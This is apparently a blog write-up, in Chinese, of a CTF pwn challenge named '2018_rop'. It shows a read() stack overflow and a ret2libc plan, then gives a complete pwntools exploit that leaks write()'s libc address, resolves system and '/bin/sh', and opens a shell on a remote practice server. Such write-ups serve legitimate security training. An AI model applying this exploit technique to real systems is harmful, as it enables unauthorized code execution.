加载头像

铁人三项(第五赛区)_2018_rop

ubuntu18


0x01


checksec

1
2
3
4
5
6
[*] '/home/zelas/Desktop/pwn/铁人三项(第五赛区)_2018_rop/2018_rop'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled \\栈不可执行
PIE: No PIE (0x8048000)

IDA

main()

1
2
3
4
5
6
int __cdecl main(int argc, const char **argv, const char **envp)
{
be_nice_to_people();
vulnerable_function();
return write(1, "Hello, World\n", 0xDu);
}

vulnerable_function()

1
2
3
4
5
6
ssize_t vulnerable_function()
{
char buf[136]; // [esp+10h] [ebp-88h] BYREF

return read(0, buf, 0x100u); //read()函数存在栈溢出漏洞
}

0x02


思路 ret2libc

  1. 利用read()溢出泄露write()真实地址
  2. 利用Libcsearcher计算出system()和bin_sh
  3. 再次执行main()函数,执行system()
s 0x88H
ebp 0x4
ret write()
write_ret main()
arg[0] 0
arg[1] write_got
arg[2] 0x4
s 0x88
ebp 0x4
ret system()
sys_ret 0xdeadbeef
arg bin_sh

0x03


libc6-i386_2.27-3ubuntu1_amd64

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
from pwn import *
from LibcSearcher import *

context(os='linux', arch='i386', log_level='debug')
io = remote('node4.buuoj.cn', 29018)
# io = process(['./2018_rop'])
elf = ELF('./2018_rop')


padding = 0x88 + 0x4
write_got = elf.got['write']
write_plt = elf.plt['write']
main_addr = elf.symbols['main']
payload = b'a' * padding + p32(write_plt) + p32(main_addr) + p32(0) + p32(write_got) + p32(0x4)
io.sendline(payload)

write_addr = u32(io.recv(4))
print('[+] write_addr', hex(write_addr))

libc = LibcSearcher('write', write_addr)
libc_base = write_addr - libc.dump('write')
system = libc_base + libc.dump('system')
bin_sh = libc_base + libc.dump('str_bin_sh')
ret = 0x08048199
payload1 = b'a' * padding + p32(ret) + p32(system) + p32(0xdeadbeef) + p32(bin_sh)
io.sendline(payload1)
io.interactive()


评论
✅ 你无需删除空行,直接评论以获取最佳展示效果
引用到评论
随便逛逛博客分类文章标签
复制地址关闭热评深色模式轉為繁體